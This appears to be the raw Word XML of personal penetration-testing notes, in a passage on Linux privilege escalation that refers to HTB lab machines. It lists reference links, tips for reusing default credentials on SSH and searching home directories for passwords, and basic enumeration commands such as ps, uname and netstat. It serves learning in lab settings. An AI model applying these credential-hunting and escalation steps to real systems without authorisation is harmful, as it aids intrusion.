      <w:hyperlink r:id="rId420">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">compendium</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by g0tmi1k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001582">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId421">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PayloadsAllTheThings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001583">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId422">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks -Linux Privilege Escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001584">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001585">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001586">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I have a bunch of sections that end in "Enumeration" and they are from the XXXXXXXXX book, so make sure to try all of those, like </w:t>
      </w:r>
      <w:hyperlink w:anchor="_e6o4a5hlp2je">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Insecure File Enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001587">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001588">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get default credentials for a website (ex. Default credentials for Pi-hole, a raspberry pi website on Mirai HTB), then try those default credentials on SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/[username]/Desktop </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On many desktops, "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/[username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you don't have execution privileges but you have read, you can use "bash" command to execute, or similarly the "zsh" or "sh" command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000158F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001590">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zsh exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001591">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001592">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001593">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can also do: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001594">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001595">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001596">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches you to root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001597">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001598">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001599">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="714"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate the root processes running on the machine using ps and grep:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps auxww | grep root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Worked in the Pilgrimage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000159F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic System Enumeration (from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId423">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cheatsheet </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">above):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lscpu </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /var/www/html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulpn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(display active network connections and listening ports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for windows while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulpn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep root | grep mysql</w:t>
      </w:r>
    </w:p>
